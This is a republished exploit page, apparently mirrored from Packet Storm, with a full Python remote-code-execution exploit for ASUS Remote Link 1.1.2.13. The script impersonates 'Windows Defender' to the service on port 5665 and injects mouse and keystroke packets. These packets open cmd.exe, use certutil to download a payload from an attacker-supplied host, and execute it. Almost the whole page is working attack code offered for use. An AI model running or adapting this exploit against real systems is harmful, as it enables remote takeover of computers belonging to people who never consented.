ASUS Remote Link 1.1.2.13 Remote Code Execution ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 27th, 2021 📆 | 8490 Views ⚑

0

ASUS Remote Link 1.1.2.13 Remote Code Execution ≈ Packet Storm

# Exploit: ASUS Remote Link 1.1.2.13 – Remote Code Execution
# Date: 24-02-2021
# Exploit Author: H4rk3nz0
# Vendor Homepage: http://asus.com/
# Software Link: http://remotelink.asus.com/
# Version: 1.1.2.13
# Tested on: Windows 10 Enterprise Build 17763
# CVE: N/A

#!/usr/bin/python

import socket
from time import sleep
import sys

port = 5665
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

prefix = “04020b02”
suffix = “0000020000000000000000000300000000000000000004000000000000000000010000”
enter = (prefix + (“0” * 1038)).decode(“hex”)
string_prefix = “04020b0200000000010000”
string_suffix = “0” * 1022
pre_command = “04000b0200000000”.decode(“hex”)
user_declare = (“02028a0000000000000057696e646f777320446566656e646572” + “0” * 224).decode(“hex”) # Declares Connection Source as ‘Windows Defender’

# ASCII to Hex Character List
characters={
“A”:”41″,”B”:”42″,”C”:”43″,”D”:”44″,”E”:”45″,”F”:”46″,”G”:”47″,”H”:”48″,”I”:”49″,”J”:”4a”,”K”:”4b”,”L”:”4c”,”M”:”4d”,”N”:”4e”,
“O”:”4f”,”P”:”50″,”Q”:”51″,”R”:”52″,”S”:”53″,”T”:”54″,”U”:”55″,”V”:”56″,”W”:”57″,”X”:”58″,”Y”:”59″,”Z”:”5a”,
“a”:”61″,”b”:”62″,”c”:”63″,”d”:”64″,”e”:”65″,”f”:”66″,”g”:”67″,”h”:”68″,”i”:”69″,”j”:”6a”,”k”:”6b”,”l”:”6c”,”m”:”6d”,”n”:”6e”,
“o”:”6f”,”p”:”70″,”q”:”71″,”r”:”72″,”s”:”73″,”t”:”74″,”u”:”75″,”v”:”76″,”w”:”77″,”x”:”78″,”y”:”79″,”z”:”7a”,
“1”:”31″,”2″:”32″,”3″:”33″,”4″:”34″,”5″:”35″,”6″:”36″,”7″:”37″,”8″:”38″,”9″:”39″,”0″:”30″,
” “:”20″,”+”:”2b”,”=”:”3d”,”/”:”2f”,”_”:”5f”,”< ":"3c",
“>”:”3e”,”[“:”5b”,”]”:”5d”,”!”:”21″,”@”:”40″,”#”:”23″,”$”:”24″,”%”:”25″,”^”:”5e”,”&”:”26″,”*”:”2a”,
“(“:”28″,”)”:”29″,”-“:”2d”,”‘”:”27″,'”‘:”22″,”:”:”3a”,”;”:”3b”,”?”:”3f”,”`”:”60″,”~”:”7e”,
“\”:”5c”,”|”:”7c”,”{“:”7b”,”}”:”7d”,”,”:”2c”,”.”:”2e”}

# User Specified arguments
try:
rhost = “192.168.1.93”
lhost = sys.argv[2]payload = sys.argv[3]except:
print(“Usage: python ” + sys.argv[0] + ” “)
exit()

# HandShake Packets to Smart Gesture Server
def Handshake():
target.connect((rhost,port))
target.sendto(“b2”.decode(“hex”),(rhost,port))
target.sendto(“38323538”.decode(“hex”),(rhost,port))
target.sendto(“03000f0000000000”.decode(“hex”),(rhost,port))
target.sendto(“03020f000000000003310000000000”.decode(“hex”),(rhost,port))
target.sendto(“02008a0000000000”.decode(“hex”),(rhost,port))
target.sendto(user_declare,(rhost,port))
sleep(0.1)

def MoveMouse():
for i in range(0,16):
target.sendto(“0000330038040006”.decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101db010000c502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101d0010000ca02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101c7010000ce02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101bd010000d202” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101b2010000d502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101a6010000d802” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010199010000db02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000133003804000601018d010000de02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010180010000e002” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010171010000e402” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010163010000e602” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010154010000e902” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010146010000eb02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000133003804000601013b010000ed02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000133003804000601012d010000f002” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010120010000f302” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010113010000f702” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010107010000fa02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101fa000000fd02” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101f10000000003” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101e50000000303” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101d90000000603” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101ce0000000903” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101c20000000d03” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101b60000001103” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101ab0000001403” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101a00000001803” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101950000001c03” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101890000002003” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000133003804000601017e0000002403” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101740000002703” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000133003804000601016c0000002a03” + suffix).decode(“hex”),(rhost,port))
target.sendto((“00013300380400060101650000002c03” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000133003804000601015c0000002f03” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000133003804000601015c0000003003” + suffix).decode(“hex”),(rhost,port))
target.sendto((“000233003804000601005c0000003003” + suffix).decode(“hex”),(rhost,port))
sleep(0.6)

# Sends Left Click Input (Occasional Delay for some Reason)
def LeftClick():
target.sendto(“0000330038040006”.decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0001330038040006010116020000e502” + suffix).decode(“hex”),(rhost,port))
target.sendto((“0002330038040006010016020000e502” + suffix).decode(“hex”),(rhost,port))
sleep(4)

# Send Enter/Return Key Input
def SendReturn():
target.sendto(pre_command,(rhost,port))
sleep(0.2)
target.sendto(enter,(rhost,port)) # Enter/Return Key

# Send String Characters
def SendString(string):
for char in string:
convert = characters[char]final_string = string_prefix + convert + string_suffix
target.sendto(pre_command,(rhost,port))
target.sendto(final_string.decode(“hex”),(rhost,port))
sleep(0.2)

# Main Execution
def main():
print(“[+] Saying Hello”)
Handshake()
sleep(2)
print(“[+] Moving Mouse”)
MoveMouse()
print(“[+] Left Clicking (takes a few seconds)”)
LeftClick() # Left Click is delayed sometimes
print(“[+] Opening CMD”)
SendString(“cmd.exe”) # Start Command Prompt
sleep(0.5)
SendReturn()
sleep(1)
print(“[+] Retrieving Payload”)
SendString(“certutil.exe -f -urlcache http://” + lhost + “/” + payload + ” C:\WindowsTemp\” + payload) # Retrieve Payload
sleep(0.5)
SendReturn()
sleep(3)
print(“[+] Executing”)
SendString(“C:\Windows\Temp\” + payload) # Execute Payload
sleep(0.5)
SendReturn()
sleep(0.5)
print(“[+] Done! Check your listener?”)
SendReturn() # Trailing Enter Command Ensures full execution
target.close()
exit()

if __name__==”__main__”:
main()

Source link

Tagged with:



Leave a Reply